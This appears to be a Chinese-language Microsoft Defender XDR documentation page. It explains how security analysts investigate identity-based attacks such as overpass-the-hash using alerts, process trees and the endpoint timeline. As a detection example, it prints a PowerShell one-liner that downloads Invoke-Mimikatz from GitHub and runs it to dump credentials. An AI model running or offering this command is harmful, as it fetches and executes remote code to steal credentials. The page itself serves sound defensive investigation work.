以身分識別為基礎的攻擊範例

適用於：

• Microsoft Defender XDR

適用於身分識別的 Microsoft Defender 可協助偵測惡意入侵組織中身分識別的嘗試。 由於適用於身分識別的 Defender 與 Microsoft Defender 全面偵測回應 整合，因此安全性分析師可以看見來自適用於身分識別的 Defender 所傳入的威脅，例如可疑的 Netlogon 許可權提升嘗試。

分析 適用於身分識別的 Microsoft Defender 中的攻擊

Microsoft Defender 全面偵測回應 可讓分析師在事件頁面的 [警示] 索引卷標上，依偵測來源篩選警示。 在下列範例中，偵測來源會篩選 為適用於身分識別的 Defender。

選取可疑的 overpass-the-hash 攻擊警示會移至 Microsoft Defender for Cloud Apps 中顯示更詳細信息的頁面。 您可以一律選取 [ 深入瞭解此警示類型 ] 來閱讀攻擊和補救建議 的描述 ，以深入瞭解警示或攻擊。

調查 適用於端點的 Microsoft Defender 中的相同攻擊

或者，分析師可以使用適用於端點的Defender來深入瞭解端點上的活動。 從事件佇列中選取事件，然後選取 [ 警示] 索引卷 標。從這裡，他們也可以識別偵測來源。 標示為 EDR 的偵測來源代表端點偵測和回應，也就是適用於端點的 Defender。 分析師從這裏選取 EDR 偵測到的警示。

警示頁面會顯示各種相關信息，例如受影響的裝置名稱、使用者名稱、自動調查的狀態，以及警示詳細數據。 警示劇本描述進程樹狀結構的可視化表示。 進程樹狀結構是與警示相關的父進程和子進程的階層式表示法。

每個程式都可以展開以檢視更多詳細數據。 分析師可以看到的詳細數據是輸入為惡意腳本、輸出連線 IP 位址和其他實用資訊一部分的實際命令。

藉由選 取 [在時程表中查看]，分析師可以進一步向下切入，以判斷入侵的確切時間。

適用於端點的 Microsoft Defender 可以偵測許多惡意檔案和腳本。 不過，由於輸出連線、PowerShell 和命令行活動有許多合法用途，某些活動會被視為良性活動，直到建立惡意檔案或活動為止。 因此，使用時間軸可協助分析師將警示放入周圍活動的內容中，以判斷攻擊的原始來源或時間，否則會被一般文件系統和用戶活動遮蔽。

若要使用時程表，分析師會在警示偵測 (紅色) 時開始，然後往回捲動，以判斷導致惡意活動的原始活動何時實際啟動。

請務必瞭解並區分常見的活動，例如 Windows Update 連線、Windows 受信任軟體啟用流量、Microsoft 網站的其他常見連線、第三方因特網活動、Microsoft 端點 Configuration Manager 活動，以及其他良性活動與可疑活動。 其中一種區分方式是使用時程表篩選。 有許多篩選條件可以醒目提示特定活動，同時篩選掉分析師不想要檢視的任何專案。

在下圖中，分析師篩選為僅檢視網路和處理事件。 此篩選準則可讓分析師查看事件周圍的網路連線和程式，其中記事本已建立與IP位址的連線，我們也會在進程樹狀結構中看到。

在此特定事件中，[記事本] 是用來建立惡意的輸出連線。 不過，攻擊者通常會使用 iexplorer.exe 來建立連線以下載惡意承載，因為通常 iexplorer.exe 程式會被視為一般網頁瀏覽器活動。

要在時程表中尋找的另一個專案是用於輸出連線的PowerShell。 分析師會尋找成功的 PowerShell 連線與命令，例如 IEX (New-Object Net.Webclient) ，後面接著裝載惡意檔案之網站的輸出連線。

在下列範例中，PowerShell 是用來從網站下載並執行Mimikatz：

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

分析師可以在搜尋列中輸入 關鍵詞，以快速搜尋關鍵詞，只顯示使用 PowerShell 建立的事件。

下一步

請參閱 網路釣魚 調查路徑。

另請參閱

• 事件概觀
• 管理事件
• 調查事件

提示

想要深入了解? Engage 技術社群中的 Microsoft 安全性社群：Microsoft Defender 全面偵測回應 技術社群。